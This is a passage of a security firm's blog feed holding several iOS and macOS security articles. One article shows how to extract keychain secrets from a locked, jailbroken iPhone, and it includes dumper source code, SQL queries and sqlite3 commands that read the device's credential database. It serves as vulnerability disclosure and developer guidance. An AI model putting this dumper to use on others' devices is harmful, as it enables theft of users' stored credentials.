You can find me on <a href="https://twitter.com/_r3ggi">Twitter</a> or <a href="https://www.linkedin.com/in/wojciech-regula/">LinkedIn</a>.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/key-aspects-of-secure-networking-on-ios/"><em>https://www.securing.pl</em></a><em> on June 8, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=f437e584a5d4" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/key-aspects-of-secure-networking-on-ios-securing-f437e584a5d4">Key aspects of secure networking on iOS — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[5 security tips for your macOS environment — Securing]]></title>
            <link>https://medium.com/securing/5-security-tips-for-your-macos-environment-securing-b8b259e0f564?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/b8b259e0f564</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[mac-admin]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[infrastructure-security]]></category>
            <category><![CDATA[macos]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Wed, 28 Apr 2021 12:02:25 GMT</pubDate>
            <atom:updated>2021-06-04T08:55:02.893Z</atom:updated>
            <content:encoded><![CDATA[<h3>5 security tips for your macOS environment</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Jr1DCMN74DcCYF8oBghFeQ.jpeg" /></figure><p>Nowadays, Macs cannot be treated as a niche platform in companies. We meet Macs in companies of all sizes — from startups to big companies with thousands of employees. It’s no big surprise that this fact has also been noticed by attackers. During security assessments, the SecuRing team observed that Mac environments are in most cases quite immature and stand out from the widely adopted Windows environments. This article will give you 5 tips that radically improve the security of your macOS infrastructure.</p><h3>Tip #1: Enroll your Macs into MDM</h3><p>We observed situations where, even in big companies, Macs were unmanaged. Users could perform whatever actions they wanted. At the same time, these computers were connected to internal company resources. Such a situation shouldn’t ever take place. Make sure you can control all Macs in your infrastructure, enforce security policies, install and update software, detect potential threats, and monitor suspicious actions.</p><h3>Tip #2: Allowlist executables</h3><p>Modern macOS versions have a lot of security improvements. Mechanisms like Notarization, the Malware Removal Tool, and Gatekeeper help users stay uninfected. However, those features are not bulletproof. We have seen notarized malware that successfully bypassed all those enhancements. Implementing an allowlist of applications that can be launched can dramatically reduce the attack surface. Even if users somehow download Apple-notarized malware, they won’t be able to launch it.</p><h3>Tip #3: Implement multi-factor authentication</h3><p>What about phishing campaigns that do not require any software to be installed? Stealing a user’s password that allows access to your Jira doesn’t sound good either. 
<a href="https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/">Research</a> shows that hardware tokens (U2F) have kept Google’s more than 85,000 employees free of successful phishing since 2017 (the research ended in 2018). Implementing U2F is really rewarding. Consider also requiring U2F when users log in to their macOS machines.</p><h3>Tip #4: Enforce security policies</h3><p>We are all used to security policies enforced on Windows machines (Group Policies). Why not implement such requirements on Macs? The feature that you are looking for is called <a href="https://support.apple.com/en-gb/guide/mac-help/mh35561/mac">Profiles</a>. It can help you enforce strong passwords, set a maximum idle time before the screen locks, disallow turning off disk encryption, properly configure the firewall, and many other useful things.</p><h3>Tip #5: Make sure your Macs are up-to-date</h3><p>This tip looks the most obvious, yet it is often neglected. It’s widely known that updating machines is important and protects users from malware and attackers that use known vulnerabilities. The SecuRing team has observed macOS environments in which users procrastinate on updates, even ones containing critical security fixes. A solution may be enforcing a minimum OS version: if users don’t update their machines, they won’t be able to access the company’s resources.</p><h3>To sum up</h3><p>Keep in mind that every operating system in your organization must be treated with the same degree of trust. Attacks on macOS environments are no longer a legend. These 5 quick tips are a good start to improving your macOS infrastructure security. 
If you are interested in a bespoke analysis — feel free to reach out to me.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/5-security-tips-for-your-macos-environment/"><em>https://www.securing.pl</em></a><em> on April 28, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b8b259e0f564" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/5-security-tips-for-your-macos-environment-securing-b8b259e0f564">5 security tips for your macOS environment — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[The secure way to store secrets on iOS devices — Securing]]></title>
            <link>https://medium.com/securing/the-secure-way-to-store-secrets-on-ios-devices-securing-23071246388?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/23071246388</guid>
            <category><![CDATA[apple]]></category>
            <category><![CDATA[ios]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[app-security]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Thu, 15 Apr 2021 06:24:24 GMT</pubDate>
            <atom:updated>2021-04-27T07:18:42.204Z</atom:updated>
            <content:encoded><![CDATA[<h3>The secure way to store secrets on iOS devices</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yeycqoVaQYJrSuRpgp0CWA.jpeg" /></figure><h3>TL;DR</h3><ul><li>Whenever possible, avoid storing secrets on the device.</li><li>The Keychain is the right place to store your app’s small secrets.</li><li>Entries saved in the Keychain can be additionally protected by setting proper accessibility and authentication flags.</li><li>Watch out what you synchronize with iCloud.</li><li>Files stored in the application container can also be additionally protected.</li><li>Always follow good mobile application development practices -&gt; see our <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">Guidelines on mobile application security — iOS edition </a>.</li></ul><h3>Background</h3><p>During the last few years of pentesting iOS apps, I have observed a lot of bad secret-storage patterns. From a security perspective there is a recommended approach, but before you start saving a secret on the device, you need to decide whether that is even necessary. The general idea is not to store sensitive information if you don’t have to. If you do have to, there are typically two kinds of secrets: small ones and big ones. Small secrets are, for example, session tokens, encryption keys, and certificates. Big secrets are databases, videos, and pictures. Below, I will show you a secure approach to storing such data.</p><h3>A safe place for small secrets</h3><p>The iOS Keychain is considered the best place to store your application’s small secrets. The Keychain is encrypted using a combination of the device key and the user’s passcode (if set). Your application talks to the securityd daemon in order to interact with the SQLite database containing the encrypted secrets. 
The Keychain facility gives us features that help with restricting access to the entries, applying additional authentication policies, synchronizing the entries with iCloud, or even giving other apps access to our entries.</p><p>iOS gives us the SecItem* C API to manage the secrets. From my experience, developers usually don’t use it directly, as this API is a bit complicated. Instead, devs use different wrappers. In the example, I will use <a href="https://github.com/kishikawakatsumi/KeychainAccess">https://github.com/kishikawakatsumi/KeychainAccess</a></p><p>Let’s take a look at the code snippet below:</p><pre>import KeychainAccess

func saveSecureKeychainItem() {
    let keychain = Keychain(service: &quot;example-service&quot;)
    DispatchQueue.global().async {
        do {
            try keychain
                .accessibility(.whenPasscodeSetThisDeviceOnly, authenticationPolicy: .biometryCurrentSet)
                .synchronizable(false)
                .set(&quot;secure-entry-value&quot;, key: &quot;secure-entry-key&quot;)
        } catch let error {
            // error handling
        }
    }
}</pre><p>I defined a service name and added the entry to the Keychain. I also set the secure attributes for that entry, making sure that:</p><ul><li>It will be accessible only when the device is unlocked,</li><li>It will be saved only when the user has set a passcode,</li><li>It will never leave the device,</li><li>It will never be synchronized,</li><li>Obtaining it will require the user’s presence,</li><li>It will be invalidated if the user changes anything in the biometry settings (for example, enrolling a new face in Face ID).</li></ul><p>By default, most frameworks / keychain wrappers will set minimal security constraints. 
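For comparison, a minimal sketch of what such wrappers do under the hood with the raw SecItem* API, reusing the illustrative service and key names from above (the biometry policy would additionally require an access-control object created with SecAccessControlCreateWithFlags):

```swift
import Foundation
import Security

func saveSecretRaw(_ value: Data) -> OSStatus {
    let attributes: [String: Any] = [
        kSecClass as String: kSecClassGenericPassword,
        kSecAttrService as String: "example-service",
        kSecAttrAccount as String: "secure-entry-key",
        kSecAttrAccessible as String: kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
        kSecValueData as String: value
    ]
    // Returns errSecDuplicateItem if the entry already exists;
    // call SecItemUpdate in that case instead.
    return SecItemAdd(attributes as CFDictionary, nil)
}
```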
<strong>However, I always recommend overriding the default values to be sure that the secret will be stored as expected.</strong> Implementations change, and thus the default settings may change as well.</p><p>For typical secrets, you won’t need those additional protections, such as requiring the user’s presence. The typical implementation looks as follows:</p><pre>import KeychainAccess

func saveLessSecureKeychainItem() {
    let keychain = Keychain(service: &quot;example-service&quot;)
    DispatchQueue.global().async {
        do {
            try keychain
                .accessibility(.afterFirstUnlockThisDeviceOnly)
                .synchronizable(false)
                .set(&quot;secure-entry-value&quot;, key: &quot;secure-entry-key&quot;)
        } catch let error {
            // error handling
        }
    }
}</pre><p>I strongly encourage you to read more about the available security flags. Look at the links below:</p><p>👉 <a href="https://developer.apple.com/documentation/security/keychain_services/keychain_items/restricting_keychain_item_accessibility">Restricting Keychain Item Accessibility</a><br>👉 <a href="https://developer.apple.com/documentation/localauthentication/accessing_keychain_items_with_face_id_or_touch_id">Accessing Keychain Items with Face ID or Touch ID</a><br>👉 <a href="https://developer.apple.com/documentation/security/ksecattrsynchronizable">kSecAttrSynchronizable</a></p><h3>Where to store big secrets?</h3><p>Big secrets are stored within your application’s container as regular files. By default, all the files are encrypted and cannot be accessed before the first unlock. So, after the first device unlock, any application that can escape the sandbox will be able to get your big secrets. This, of course, requires exploiting a vulnerability in iOS, but this article is about hardening. 
Under certain circumstances, applications running on jailbroken devices can also escape their containers without any additional vulnerabilities.</p><p>The mechanism that allows us to control on-disk file encryption is called the Data Protection API. If you want your file to be accessible only when the device is unlocked, you want the NSFileProtectionComplete flag. Below you can see an example:</p><pre>do {
    try data.write(to: fileURL, options: .completeFileProtection)
} catch let error {
    // error handling
}</pre><p>OK, but what if your threat model requires an additional layer of protection? What if you don’t want your big secret to be accessible to a sandbox escaper? Well, let’s take a look at the example below:</p><pre>import GRDB

func openDB() -&gt; DatabaseQueue? {
    do {
        var config = Configuration()
        config.prepareDatabase = { db in
            try db.usePassphrase(getDatabasePassphraseFromKeychain())
        }
        let dbQueue = try DatabaseQueue(path: getDBPath(), configuration: config)
        return dbQueue
    } catch let error {
        // error handling
    }
    return nil
}</pre><p>I used <a href="https://github.com/groue/GRDB.swift">GRDB</a> to create an SQLite database. What’s special about this database is that it’s encrypted using SQLCipher. The passphrase is stored securely in the Keychain. Please keep in mind that there are two traps. The first one is the passphrase storage — do not hardcode it in your code! The second trap is managing the passphrase’s in-memory lifetime. As you can see in the example above, I obtain the secret inside the closure used to prepare the Configuration() that then opens the database. The passphrase is not kept in memory longer than necessary.</p><h3>Summary</h3><p><strong>Do not store secrets on the device if you do not have to.</strong> That’s the sentence I want to repeat once again in the summary. 
My iOS app pentesting experience shows that secrets are often stored insecurely. I have seen them in Info.plist files or even hardcoded. In this article, I wanted to show you how to properly store secrets that have to be on the device. Use the Keychain with proper security flags to store small secrets. Consider additionally encrypting big secrets with a properly stored encryption key.</p><p>It is also always worth following good practices in the iOS application development process. On this topic, we especially recommend our own <a href="https://www.securing.pl/en/guidelines-on-mobile-application-security-ios-edition/">guide</a>, where we have gathered our experience with ready-made solutions.</p><p>If you have any questions, feel free to use our contact form, or reach me directly on <a href="https://twitter.com/_r3ggi">Twitter</a> or <a href="https://www.linkedin.com/in/wojciech-regula/">LinkedIn</a>.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/the-secure-way-to-store-secrets-on-ios-devices/"><em>https://www.securing.pl</em></a><em> on April 15, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=23071246388" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/the-secure-way-to-store-secrets-on-ios-devices-securing-23071246388">The secure way to store secrets on iOS devices — Securing</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Stealing your app’s keychain entries from locked iPhone]]></title>
            <link>https://medium.com/securing/stealing-your-apps-keychain-entries-from-locked-iphone-5c40fdb13a7a?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/5c40fdb13a7a</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[iphone]]></category>
            <category><![CDATA[keychain]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[ios]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Tue, 05 Jan 2021 13:43:16 GMT</pubDate>
            <atom:updated>2021-01-08T12:25:45.086Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Elz_Zq2vmw9jqqrrXNpAMw.jpeg" /></figure><h3>What is the Keychain?</h3><p>The Keychain is essentially the safest place on your phone for storing data. It is used by developers to store passwords, certificates, identities, and other keys in many forms. It is widely adopted, and many developers already understand how important it is to keep the most sensitive data in a place that was made exactly for this purpose. As good as it sounds, this doesn’t mean that using the Keychain makes your application 100% safe. (Not so) commonly made mistakes during the development process, like using a deprecated API or not updating the app for a long time, may lead to user data being exposed to future attacks. Oftentimes, developers tend to use incorrect attributes to secure their keys. Sometimes because of a lack of experience, sometimes because “this way it was easier”.</p><p>Until the end of last year, we could say that getting access to the Keychain was difficult and our data was mostly secure. Stealing data from someone’s keychain wasn’t trivial: the victim’s phone usually needed to be already jailbroken, ideally with the SSH password still set to the default *alpine*. In this article, we will show you how to access some Keychain entries in a different way.</p><h3>What can go wrong?</h3><p>Asking yourself “What can go wrong if I store data like this?” should be common practice while writing code. Sadly, in an environment where everything has to work until yesterday, no one has time to question whether storing “Password1235” in plaintext with the attribute “accessible always” is a good idea. No time for that. 
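To make that anti-pattern concrete, a hypothetical sketch of the kind of code we mean (do not copy this; the names are illustrative, and kSecAttrAccessibleAlways has been deprecated since iOS 12):

```swift
import Foundation
import Security

// ANTI-PATTERN: a plaintext secret readable even while the device is locked.
let badAttributes: [String: Any] = [
    kSecClass as String: kSecClassGenericPassword,
    kSecAttrService as String: "example-service",
    kSecValueData as String: Data("Password1235".utf8),
    kSecAttrAccessible as String: kSecAttrAccessibleAlways // deprecated for a reason
]
SecItemAdd(badAttributes as CFDictionary, nil)
```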
And then, there are consequences.</p><p>Checkm8, a bootrom exploit by @axi0mX, revolutionized the jailbreak scene and the world of tweak writers, but most importantly, it had a huge impact on security.</p><p>Apple quickly realized what was happening and had to rethink what is accessible, and when, in order to reduce the amount of vulnerable data. The Keychain, the safest place for storing data, became vulnerable as well. Keys with the attributes “kSecAttrAccessibleAlways” and “kSecAttrAccessibleAlwaysThisDeviceOnly” were an obvious choice for Apple to restrict, so they quickly deprecated those options and added warnings in Xcode to, well… warn developers not to use those attributes. And so, half a year later, @m1nacriss released his m1napatcher, which simply got rid of USB Restricted Mode and at the same time allowed unauthorized users to jailbreak devices that previously needed to be unlocked. Now the very same functionality is included in the checkra1n jailbreak, allowing an attacker to deploy SSH and any binary they want to an iDevice in their hands. Enter the main character of today’s episode — the keychain dumper.</p><p>The keychain dumper is a simple, yet powerful application that allows you to extract keys from the iOS keychain. Different parts of the keychain have different requirements for dumping their information. From the attacker’s point of view, the low-hanging fruit, “kSecAttrAccessibleAlways”, is exactly what we’re looking for. No password is needed, not even for the lock screen.</p><p>Our team decided to investigate how much data we could extract from over a hundred different applications, including VPNs, password managers, and the most popular applications in the Canadian, Polish, and Japanese App Stores. We looked for keys, tokens, passwords… basically everything that could be useful for an attacker. 
<strong>And the results were surprising.</strong></p><p>The AccessibleAlways keychain attribute was common even in <strong>popular applications.</strong></p><h3>Dumping always accessible entries</h3><p>As we showed in the previous section, there are <strong>entries that can be dumped always, even from a locked iPhone</strong>.</p><p>Before we can create and install the keychain dumper, we have to jailbreak our iDevice. For that purpose, we used the checkra1n jailbreak, which works for iPhones up to the X. All we need to do is put the iPhone into recovery mode, connect the device to our Mac, and run checkra1n. After completion, we can connect via SSH. Remember that the SSH server is bound to port 44 (not 22). Another interesting thing is that we have skipped USB Restricted Mode. New versions of checkra1n kill that, so we do not have to worry about it:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/599/0*aRTWFH_NoofnO54S.png" /></figure><p>When creating the keychain dumper, we had to make sure we would ask only for the always-accessible entries. First, we open the keychain-2.db database and query for the vulnerable application groups:</p><pre>select distinct agrp from genp where pdmn in (&#39;dk&#39;, &#39;dku&#39;)
union
select distinct agrp from inet where pdmn in (&#39;dk&#39;, &#39;dku&#39;)
union
select distinct agrp from cert where pdmn in (&#39;dk&#39;, &#39;dku&#39;)
union
select distinct agrp from keys where pdmn in (&#39;dk&#39;, &#39;dku&#39;);</pre><h4>Let’s analyze the SQL query:</h4><p>We take data from the following tables:</p><ul><li>“genp”, which stands for Generic Passwords,</li><li>“inet”, which stands for Internet Passwords,</li><li>“cert” — Certificates,</li><li>“keys” — Cryptographic Keys.</li></ul><p>We are interested only in the “dk” and “dku” kSecAttrAccessible values. 
They stand for:</p><ul><li>kSecAttrAccessibleAlways (“dk”)</li><li>kSecAttrAccessibleAlwaysThisDeviceOnly (“dku”)</li></ul><p>Summing up, the query retrieves the keychain access group names that have entries which are accessible always — even before the first unlock. These names will later be used for getting the actual keychain data.</p><p>The next step is to create the Keychain query. We used the following code:</p><pre>- (NSMutableDictionary *)prepareDict {
    NSMutableDictionary *query = [NSMutableDictionary new];
    [query setObject:(__bridge id)kCFBooleanTrue forKey:(__bridge id)kSecReturnAttributes];
    [query setObject:(__bridge id)kSecMatchLimitAll forKey:(__bridge id)kSecMatchLimit];
    [query setObject:(__bridge id)kCFBooleanTrue forKey:(__bridge id)kSecReturnData];
    return query;
}

- (NSMutableDictionary *)prepareDictWithkSecAccessibleAlways {
    NSMutableDictionary *query = [self prepareDict];
    [query setObject:(__bridge id)kSecAttrAccessibleAlways forKey:(__bridge id)kSecAttrAccessible];
    return query;
}

- (NSMutableDictionary *)prepareDictWithkSecAccessibleAlwaysThisDeviceOnly {
    NSMutableDictionary *query = [self prepareDict];
    [query setObject:(__bridge id)kSecAttrAccessibleAlwaysThisDeviceOnly forKey:(__bridge id)kSecAttrAccessible];
    return query;
}

- (void)queryWithGroup:(NSString *)group {
    NSArray *secItemClasses = [NSArray arrayWithObjects:(__bridge id)kSecClassGenericPassword,
                                                        (__bridge id)kSecClassInternetPassword,
                                                        (__bridge id)kSecClassCertificate,
                                                        (__bridge id)kSecClassKey,
                                                        (__bridge id)kSecClassIdentity, nil];
    NSArray *dictsWithDifferentAccessibilityLevels = @[[self prepareDictWithkSecAccessibleAlways],
                                                       [self prepareDictWithkSecAccessibleAlwaysThisDeviceOnly]];
    for (NSMutableDictionary *dict in dictsWithDifferentAccessibilityLevels) {
        [dict setObject:group forKey:(__bridge id)kSecAttrAccessGroup];
        for (id secItemClass in secItemClasses) {
            [dict setObject:secItemClass forKey:(__bridge id)kSecClass];
            CFTypeRef result = NULL;
            if (SecItemCopyMatching((__bridge CFDictionaryRef)dict, &amp;result) == noErr) {
                if (result != NULL) {
                    NSArray *resultArray = (__bridge NSArray *)result;
                    for (NSDictionary *keychainEntryDict in resultArray) {
                        [self printEntry:keychainEntryDict];
                    }
                    CFRelease(result);
                }
            }
        }
    }
}</pre><p>Next, we have to build the dumper and sign it with specific keychain entitlements. This part is tricky. Before iOS 13.5, we could set “keychain-access-groups” to “*” (a wildcard) and query for all entries. Since iOS 13.5, the wildcard no longer works. We can dump all the access groups with the following commands:</p><pre>sqlite3 /var/Keychains/keychain-2.db &quot;SELECT DISTINCT agrp FROM genp&quot; &gt; ./groups.txt
sqlite3 /var/Keychains/keychain-2.db &quot;SELECT DISTINCT agrp FROM cert&quot; &gt;&gt; ./groups.txt
sqlite3 /var/Keychains/keychain-2.db &quot;SELECT DISTINCT agrp FROM inet&quot; &gt;&gt; ./groups.txt
sqlite3 /var/Keychains/keychain-2.db &quot;SELECT DISTINCT agrp FROM keys&quot; &gt;&gt; ./groups.txt</pre><p>Let’s take Viber’s access group as an example:</p><pre>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br>&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;<a href="http://www.apple.com/DTDs/PropertyList-1.0.dtd">http://www.apple.com/DTDs/PropertyList-1.0.dtd</a>&quot;&gt;<br>&lt;plist version=&quot;1.0&quot;&gt;<br> &lt;dict&gt;<br>  &lt;key&gt;keychain-access-groups&lt;/key&gt;<br>  &lt;array&gt;<br>   &lt;string&gt;69V327AA4Z.group.viber.share.keychain&lt;/string&gt;<br>  &lt;/array&gt;<br>  &lt;key&gt;platform-application&lt;/key&gt;<br>  &lt;true/&gt;<br>  
&lt;key&gt;com.apple.private.security.no-container&lt;/key&gt;<br>  &lt;true/&gt;<br> &lt;/dict&gt;<br>&lt;/plist&gt;</pre><p>We can sign the application using the “ldid” tool (ldid -Sents.xml app). When the application is prepared, use “scp” to upload the dumper to your iPhone.</p><p>We opened the dumper and observed Viber’s entries <strong>before the first unlock</strong> of the iPhone:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1002/0*Efs5xLpjWEjs4zcq.png" /></figure><h3>Additional thoughts</h3><p>As we showed in the “What can go wrong” section, applications store sensitive information insecurely. We also observed other serious consequences:</p><h3>Storing a PIN to the application</h3><p>We found one finance application that stored a plaintext PIN with the alwaysAccessible attribute. In our experience, users often use the same PIN in applications and to unlock their iPhones, so such a scenario may lead to unlocking the device.</p><h3>Listing applications</h3><p>Since the Keychain database stores the application access groups, it is possible to retrieve a list of the applications installed on the iDevice.</p><h3>Breaking VPNs</h3><p>Seeing TorGuard store users’ logins and passwords in plaintext with kSecAttrAccessibleAlways is even more terrible if you take into consideration that it is the most recommended VPN application on <a href="https://www.vpntierlist.com/vpn-tier-list/">TomSpark’s VPN Tier List</a>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/530/0*v8kpy2GzLGNpZaWb.jpg" /></figure><p>TorGuard has an open bug bounty program, but after half a year we still haven’t received a response to the reported problem. They did switch to kSecAttrAccessibleAlwaysThisDeviceOnly, but they now store the plaintext information in the form of a plist in the Keychain, which can still be decoded and accessed.</p><pre>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br>&lt;!DOCTYPE plist PUBLIC 
&quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;<a href="http://www.apple.com/DTDs/PropertyList-1.0.dtd">http://www.apple.com/DTDs/PropertyList-1.0.dtd</a>&quot;&gt;<br>&lt;plist version=&quot;1.0&quot;&gt;<br> &lt;dict&gt;<br>  &lt;key&gt;$archiver&lt;/key&gt;<br>  &lt;string&gt;NSKeyedArchiver&lt;/string&gt;<br>  &lt;key&gt;$objects&lt;/key&gt;<br>  &lt;array&gt;<br>   &lt;string&gt;$null&lt;/string&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;$class&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;7&lt;/integer&gt;<br>    &lt;/dict&gt;<br>    &lt;key&gt;email&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;2&lt;/integer&gt;<br>    &lt;/dict&gt;<br>    &lt;key&gt;id&lt;/key&gt;<br>    &lt;integer&gt;-1&lt;/integer&gt;<br>    &lt;key&gt;vpn-credentials&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;3&lt;/integer&gt;<br>    &lt;/dict&gt;<br>   &lt;/dict&gt;<br>   &lt;string&gt;anonymous&lt;/string&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;$class&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;6&lt;/integer&gt;<br>    &lt;/dict&gt;<br>    &lt;key&gt;password&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;5&lt;/integer&gt;<br>    &lt;/dict&gt;<br>    &lt;key&gt;username&lt;/key&gt;<br>    &lt;dict&gt;<br>     &lt;key&gt;CF$UID&lt;/key&gt;<br>     &lt;integer&gt;4&lt;/integer&gt;<br>    &lt;/dict&gt;<br>   &lt;/dict&gt;<br>   &lt;string&gt;<a href="mailto:secretmail@mail.com">secretmail@mail.com</a>&lt;/string&gt;<br>   &lt;string&gt;SecretPassword&lt;/string&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;$classes&lt;/key&gt;<br>    &lt;array&gt;<br>     &lt;string&gt;MDCredentials&lt;/string&gt;<br>     &lt;string&gt;MDResponse&lt;/string&gt;<br>     &lt;string&gt;NSObject&lt;/string&gt;<br>    &lt;/array&gt;<br>    &lt;key&gt;$classname&lt;/key&gt;<br>    
&lt;string&gt;MDCredentials&lt;/string&gt;<br>   &lt;/dict&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;$classes&lt;/key&gt;<br>    &lt;array&gt;<br>     &lt;string&gt;MDUser&lt;/string&gt;<br>     &lt;string&gt;MDResponse&lt;/string&gt;<br>     &lt;string&gt;NSObject&lt;/string&gt;<br>    &lt;/array&gt;<br>    &lt;key&gt;$classname&lt;/key&gt;<br>    &lt;string&gt;MDUser&lt;/string&gt;<br>   &lt;/dict&gt;<br>  &lt;/array&gt;<br>  &lt;key&gt;$top&lt;/key&gt;<br>  &lt;dict&gt;<br>   &lt;key&gt;root&lt;/key&gt;<br>   &lt;dict&gt;<br>    &lt;key&gt;CF$UID&lt;/key&gt;<br>    &lt;integer&gt;1&lt;/integer&gt;<br>   &lt;/dict&gt;<br>  &lt;/dict&gt;<br>  &lt;key&gt;$version&lt;/key&gt;<br>  &lt;integer&gt;100000&lt;/integer&gt;<br> &lt;/dict&gt;<br>&lt;/plist&gt;</pre><p>Let’s imagine a worse scenario where an attacker steals the victim’s iPhone, dumps the keychain, and gains access to the company’s internal network.</p><h3>Summary</h3><p>In this article, we wanted to show you that the Keychain is the right place to store your app’s secrets, but it has to be used wisely. 
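</p><p>As a sketch of what using the Keychain wisely can look like in code (the plain string literals here stand in for the real kSec… CFString constants of the Security framework, and the service/account names are made up):</p>

```swift
import Foundation

// Sketch of a SecItemAdd-style query that makes the accessibility class an
// explicit choice. NOTE: the string literals stand in for the real kSec…
// constants from the Security framework; on iOS you would use the constants.
func keychainAddQuery(service: String, account: String,
                      secret: Data, requirePasscode: Bool) -> [String: Any] {
    // kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly never migrates off-device;
    // kSecAttrAccessibleAfterFirstUnlock is the minimum reasonable default.
    let accessible = requirePasscode
        ? "kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly"
        : "kSecAttrAccessibleAfterFirstUnlock"
    return [
        "kSecClass": "kSecClassGenericPassword",
        "kSecAttrService": service,
        "kSecAttrAccount": account,
        "kSecValueData": secret,
        "kSecAttrAccessible": accessible,
    ]
}
```

<p>On iOS, the returned dictionary would be handed to SecItemAdd. The point is that the accessibility class becomes a reviewable decision instead of the insecure default.</p><p>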
<strong>Setting weak accessibility attributes may allow attackers to steal secrets from relatively modern iPhones running the newest iOS versions.</strong></p><p>We recommend setting the accessibility attribute to at least <a href="https://developer.apple.com/documentation/security/ksecattraccessibleafterfirstunlock?language=objc">kSecAttrAccessibleAfterFirstUnlock</a>.</p><p>For the most important secrets, consider using <a href="https://developer.apple.com/documentation/security/ksecattraccessiblewhenpasscodesetthisdeviceonly?language=objc">kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly</a>, which ensures that the entry can be saved only on a device that has a Passcode/PIN set and that it will never leave that device.</p><p>Special thanks to <strong>Dawid Pastuszak</strong> — co-author of this article.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/stealing-your-apps-keychain-entries-from-locked-iphone/"><em>https://www.securing.pl</em></a><em> on January 5, 2021.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=5c40fdb13a7a" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/stealing-your-apps-keychain-entries-from-locked-iphone-5c40fdb13a7a">Stealing your app’s keychain entries from locked iPhone</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Local Privilege Escalation in macOS infrastructure]]></title>
            <link>https://medium.com/securing/local-privilege-escalation-in-macos-infrastructure-df02df60bab2?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/df02df60bab2</guid>
            <category><![CDATA[apple]]></category>
            <category><![CDATA[infrastructure]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[security-testing]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Wed, 09 Dec 2020 12:03:07 GMT</pubDate>
            <atom:updated>2021-01-08T10:38:40.282Z</atom:updated>
